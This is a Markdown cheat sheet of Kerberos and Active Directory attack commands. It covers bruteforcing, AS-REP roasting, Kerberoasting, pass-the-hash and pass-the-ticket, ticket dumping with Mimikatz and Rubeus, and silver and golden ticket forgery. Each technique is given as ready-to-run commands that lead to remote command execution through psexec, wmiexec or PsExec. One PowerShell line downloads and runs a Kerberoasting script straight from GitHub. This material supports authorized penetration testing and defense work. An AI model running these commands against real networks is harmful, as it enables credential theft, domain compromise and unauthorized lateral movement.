 # Kerberos cheatsheet

## Bruteforcing

With [kerbrute.py](https://github.com/TarlogicSecurity/kerbrute):
```shell
python kerbrute.py -domain <domain\_name> -users <users\_file> -passwords <passwords\_file> -outputfile <output\_file>
```

With [Rubeus](https://github.com/Zer1t0/Rubeus) version with brute module:
```shell
# with a list of users
.\\Rubeus.exe brute /users:<users\_file> /passwords:<passwords\_file> /domain:<domain\_name> /outfile:<output\_file>

# check passwords for all users in current domain
.\\Rubeus.exe brute /passwords:<passwords\_file> /outfile:<output\_file>
```

## ASREPRoast

With [Impacket](https://github.com/SecureAuthCorp/impacket) example GetNPUsers.py:
```shell
# check ASREPRoast for all domain users (credentials required)
python GetNPUsers.py <domain\_name>/<domain\_user>:<domain\_user\_password> -request -format <AS\_REP\_responses\_format [hashcat | john]> -outputfile <output\_AS\_REP\_responses\_file>

# check ASREPRoast for a list of users (no credentials required)
python GetNPUsers.py <domain\_name>/ -usersfile <users\_file> -format <AS\_REP\_responses\_format [hashcat | john]> -outputfile <output\_AS\_REP\_responses\_file>
```

With [Rubeus](https://github.com/GhostPack/Rubeus):
```shell
# check ASREPRoast for all users in current domain
.\\Rubeus.exe asreproast  /format:<AS\_REP\_responses\_format [hashcat | john]> /outfile:<output\_hashes\_file>
```

Cracking with dictionary of passwords:
```shell
hashcat -m 18200 -a 0 <AS\_REP\_responses\_file> <passwords\_file>

john --wordlist=<passwords\_file> <AS\_REP\_responses\_file>
```


## Kerberoasting

With [Impacket](https://github.com/SecureAuthCorp/impacket) example GetUserSPNs.py:
```shell
python GetUserSPNs.py <domain\_name>/<domain\_user>:<domain\_user\_password> -outputfile <output\_TGSs\_file>
```


With [Rubeus](https://github.com/GhostPack/Rubeus):
```shell
.\\Rubeus.exe kerberoast /outfile:<output\_TGSs\_file>
```

With **Powershell**:
```
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module\_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat <TGSs\_format [hashcat | john]> | % { $\_.Hash } | Out-File -Encoding ASCII <output\_TGSs\_file>
```

Cracking with dictionary of passwords:
```shell
hashcat -m 13100 --force <TGSs\_file> <passwords\_file>

john --format=krb5tgs --wordlist=<passwords\_file> <AS\_REP\_responses\_file>
```


## Overpass The Hash/Pass The Key (PTK)

By using [Impacket](https://github.com/SecureAuthCorp/impacket) examples:
```shell
# Request the TGT with hash
python getTGT.py <domain\_name>/<user\_name> -hashes [lm\_hash]:<ntlm\_hash>
# Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)
python getTGT.py <domain\_name>/<user\_name> -aesKey <aes\_key>
# Request the TGT with password
python getTGT.py <domain\_name>/<user\_name>:[password]
# If not provided, password is asked

# Set the TGT for impacket use
export KRB5CCNAME=<TGT\_ccache\_file>

# Execute remote commands with any of the following by using the TGT
python psexec.py <domain\_name>/<user\_name>@<remote\_hostname> -k -no-pass
python smbexec.py <domain\_name>/<user\_name>@<remote\_hostname> -k -no-pass
python wmiexec.py <domain\_name>/<user\_name>@<remote\_hostname> -k -no-pass
```


With [Rubeus](https://github.com/GhostPack/Rubeus) and [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec):
```shell
# Ask and inject the ticket
.\\Rubeus.exe asktgt /domain:<domain\_name> /user:<user\_name> /rc4:<ntlm\_hash> /ptt

# Execute a cmd in the remote machine
.\\PsExec.exe -accepteula \\\\<remote\_hostname> cmd
```



## Pass The Ticket (PTT)

### Harvest tickets from Linux

Check type and location of tickets:

```shell
grep default\_ccache\_name /etc/krb5.conf
```
If none return, default is FILE:/tmp/krb5cc\_%{uid}.

In case of file tickets, you can copy-paste (if you have permissions) for use them.

In case of being *KEYRING* tickets, you can use [tickey](https://github.com/TarlogicSecurity/tickey) to get them:

```shell
# To dump current user tickets, if root, try to dump them all by injecting in other user processes
# to inject, copy tickey in a reachable folder by all users
cp tickey /tmp/tickey
/tmp/tickey -i
```

### Harvest tickets from Windows

With [Mimikatz](https://github.com/gentilkiwi/mimikatz):
```shell
mimikatz # sekurlsa::tickets /export
```

With [Rubeus](https://github.com/GhostPack/Rubeus) in Powershell:
```shell
.\\Rubeus dump

# After dump with Rubeus tickets in base64, to write the in a file
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<bas64\_ticket>"))
```


To convert tickets between Linux/Windows format with [ticket\_converter.py](https://github.com/Zer1t0/ticket\_converter):

```
python ticket\_converter.py ticket.kirbi ticket.ccache
python ticket\_converter.py ticket.ccache ticket.kirbi
```

### Using ticket in Linux:

With [Impacket](https://github.com/SecureAuthCorp/impacket) examples:
```shell
# Set the ticket for impacket use
export KRB5CCNAME=<TGT\_ccache\_file\_path>

# Execute remote commands with any of the following by using the TGT
python psexec.py <domain\_name>/<user\_name>@<remote\_hostname> -k -no-pass
python smbexec.py <domain\_name>/<user\_name>@<remote\_hostname> -k -no-pass
python wmiexec.py <domain\_name>/<user\_name>@<remote\_hostname> -k -no-pass
```


### Using ticket in Windows

Inject ticket with [Mimikatz](https://github.com/gentilkiwi/mimikatz):
```shell
mimikatz # kerberos::ptt <ticket\_kirbi\_file>
```

Inject ticket with [Rubeus](https://github.com/GhostPack/Rubeus):
```shell
.\\Rubeus.exe ptt /ticket:<ticket\_kirbi\_file>
```

Execute a cmd in the remote machine with [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec):
```shell
.\\PsExec.exe -accepteula \\\\<remote\_hostname> cmd
```

## Silver ticket

With [Impacket](https://github.com/SecureAuthCorp/impacket) examples:
```shell
# To generate the TGS with NTLM
python ticketer.py -nthash <ntlm\_hash> -domain-sid <domain\_sid> -domain <domain\_name> -spn <service\_spn>  <user\_name>

# To generate the TGS with AES key
python ticketer.py -aesKey <aes\_key> -domain-sid <domain\_sid> -domain <domain\_name> -spn <service\_spn>  <user\_name>

# Set the ticket for impacket use
export KRB5CCNAME=<TGS\_ccache\_file>

# Execute remote commands with any of the following by using the TGT
python psexec.py <domain\_name>/<user\_name>@<remote\_hostname> -k -no-pass
python smbexec.py <domain\_name>/<user\_name>@<remote\_hostname> -k -no-pass
python wmiexec.py <domain\_name>/<user\_name>@<remote\_hostname> -k -no-pass
```

With [Mimikatz](https://github.com/gentilkiwi/mimikatz):
```shell
# To generate the TGS with NTLM
mimikatz # kerberos::golden /domain:<domain\_name>/sid:<domain\_sid> /rc4:<ntlm\_hash> /user:<user\_name> /service:<service\_name> /target:<service\_machine\_hostname>

# To generate the TGS with AES 128 key
mimikatz # kerberos::golden /domain:<domain\_name>/sid:<domain\_sid> /aes128:<krbtgt\_aes128\_key> /user:<user\_name> /service:<service\_name> /target:<service\_machine\_hostname>

# To generate the TGS with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)
mimikatz # kerberos::golden /domain:<domain\_name>/sid:<domain\_sid> /aes256:<krbtgt\_aes256\_key> /user:<user\_name> /service:<service\_name> /target:<service\_machine\_hostname>

# Inject TGS with Mimikatz
mimikatz # kerberos::ptt <ticket\_kirbi\_file>
```

Inject ticket with [Rubeus](https://github.com/GhostPack/Rubeus):
```shell
.\\Rubeus.exe ptt /ticket:<ticket\_kirbi\_file>
```

Execute a cmd in the remote machine with [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec):
```shell
.\\PsExec.exe -accepteula \\\\<remote\_hostname> cmd
```

## Golden ticket

With [Impacket](https://github.com/SecureAuthCorp/impacket) examples:
```shell
# To generate the TGT with NTLM
python ticketer.py -nthash <krbtgt\_ntlm\_hash> -domain-sid <domain\_sid> -domain <domain\_name>  <user\_name>

# To generate the TGT with AES key
python ticketer.py -aesKey <aes\_key> -domain-sid <domain\_sid> -domain <domain\_name>  <user\_name>

# Set the ticket for impacket use
export KRB5CCNAME=<TGS\_ccache\_file>

# Execute remote commands with any of the following by using the TGT
python psexec.py <domain\_name>/<user\_name>@<remote\_hostname> -k -no-pass
python smbexec.py <domain\_name>/<user\_name>@<remote\_hostname> -k -no-pass
python wmiexec.py <domain\_name>/<user\_name>@<remote\_hostname> -k -no-pass
```


With [Mimikatz](https://github.com/gentilkiwi/mimikatz):
```shell
# To generate the TGT with NTLM
mimikatz # kerberos::golden /domain:<domain\_name>/sid:<domain\_sid> /rc4:<krbtgt\_ntlm\_hash> /user:<user\_name>

# To generate the TGT with AES 128 key
mimikatz # kerberos::golden /domain:<domain\_name>/sid:<domain\_sid> /aes128:<krbtgt\_aes128\_key> /user:<user\_name>

# To generate the TGT with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)
mimikatz # kerberos::golden /domain:<domain\_name>/sid:<domain\_sid> /aes256:<krbtgt\_aes256\_key> /user:<user\_name>

# Inject TGT with Mimikatz
mimikatz # kerberos::ptt <ticket\_kirbi\_file>
```

Inject ticket with [Rubeus](https://github.com/GhostPack/Rubeus):
```shell
.\\Rubeus.exe ptt /ticket:<ticket\_kirbi\_file>
```

Execute a cmd in the remote machine with [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec):
```shell
.\\PsExec.exe -accepteula \\\\<remote\_hostname> cmd
```

## Misc

To get NTLM from password:
```python
python -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "<password>".encode("utf-16le")).digest())'
```

## Tools

*[Impacket](https://github.com/SecureAuthCorp/impacket)
*[Mimikatz](https://github.com/gentilkiwi/mimikatz)
*[Rubeus](https://github.com/GhostPack/Rubeus)
*[Rubeus](https://github.com/Zer1t0/Rubeus) with brute module
*[PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec)
*[kerbrute.py](https://github.com/TarlogicSecurity/kerbrute)
*[tickey](https://github.com/TarlogicSecurity/tickey)
*[ticket\_converter.py](https://github.com/Zer1t0/ticket\_converter)
